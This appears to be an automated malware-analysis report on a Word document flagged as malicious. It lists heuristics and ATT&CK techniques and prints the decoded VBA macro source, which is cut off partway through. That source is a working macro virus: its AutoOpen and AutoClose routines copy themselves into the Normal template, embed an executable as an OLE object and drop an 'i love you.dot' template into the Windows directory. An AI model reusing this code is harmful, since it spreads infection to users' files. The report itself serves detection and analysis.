MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon document opening. The script uses CreateObject to embed an OLE object and attempts to save the document as a template in the Windows directory, indicating an effort to establish persistence and execute a payload. The presence of legacy WordBasic markers further supports the malicious nature of the document.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5068 bytes |
SHA-256: 027e69ea7daf87f7834027aba3f9ae13cf79dd1907c9b8d219e7ad9d8cb5b4c8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ily"
Public biaosi As String
Public danqian As String
Public biaosi1 As String
Sub autoopen()
Dim fso, dirwin, dirsystem, dirtemp, winnormal
Set fso = CreateObject("scripting.filesystemobject")
Set dirwin = fso.getspecialfolder(0)
Set dirsystem = fso.getspecialfolder(1)
Set dirtemp = fso.getspecialfolder(2)
'winnormal = Left$(dirtemp, (Len(dirtemp) - 13)) + "Application Data\Microsoft\Templates"
biaosi = ActiveDocument.Name
If biaosi <> "i love you.dot" Then
danqian = ActiveDocument.Path + "\" + ActiveDocument.Name
On Error GoTo mathhandler
Application.OrganizerCopy Source:= _
danqian, Destination _
:= _
NormalTemplate.FullName _
, Name:="ily", Object:=wdOrganizerObjectProjectItems
Selection.InlineShapes.AddOLEObject ClassType:="Package", FileName:= _
dirwin & "\i love you.exe", LinkToFile:=False, DisplayAsIcon:=False
If misflag <> 1 Then
Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdExtend
Selection.Cut
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.Paste
ActiveDocument.SaveAs FileName:=dirwin & "\i love you.dot", FileFormat:=wdFormatTemplate _
, LockComments:=False, Password:="", AddToRecentFiles:=True, _
WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, _
SaveNativePictureFormat:=False, SaveFormsData:=False, SaveAsAOCELetter:= _
False
Documents.Open FileName:=danqian, ConfirmConversions:=True, _
ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto
'Documents("C:\winnt\i love you.dot").Save
Windows("i love you.dot").Close
flag1 = 1
Else
End If
If flag1 <> 1 Then
Documents.Open FileName:=dirwin & "\i love you.dot", ConfirmConversions:=True, _
ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto
Application.OrganizerCopy Source:= _
dirwin & "\i love you.dot" _
, Destination:=danqian _
, Name:="ily", Object:=wdOrganizerObjectProjectItems
Selection.MoveRight Unit:=wdCharacter, Count:=1, Extend:=wdExtend
Selection.Copy
'Documents("C:\winnt\i love you.dot").Save
Windows("i love you.dot").Close
Selection.Paste
ActiveDocument.Save
Application.WindowState = wdWindowStateNormal
Else
End If
mathhandler:
misflag = 1
Resume Next
Else
End If
End Sub
Sub autoclose()
Dim fso, dirwin, dirsystem, dirtemp, winnormal
Set fso = CreateObject("scripting.filesystemobject")
Set dirwin = fso.getspecialfolder(0)
Set dirsystem = fso.getspecialfolder(1)
Set dirtemp = fso.getspecialfolder(2)
winnormal = Left$(dirtemp, (Len(dirtemp) - 13)) + "Application Data\Microsoft\Templates"
On Error GoTo mathhandler2
biaosi1 = ActiveDocument.Name
If biaosi1 <> "i love you.dot" Then
Documents.Open FileName:=dirwin & "\i love you.dot", ConfirmConversions:=True, _
ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
WritePasswordTemplate:="", Format:=wdOpenFormatAuto
Selection.MoveRight Unit:=wdCharacter, Count:=1, Extend:=wdExtend
Selection.Copy
Windows("i love you.dot").Close
Documents(biaosi1).Activate
With ActiveDocument
Selection.HomeKey Unit:=wdStory
Selection.Paste
Selection.EndKey Unit:=wdStory
Selection.Paste
End With
ActiveDocument.Save
Application.WindowState = wdWindowStateNormal
Else
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.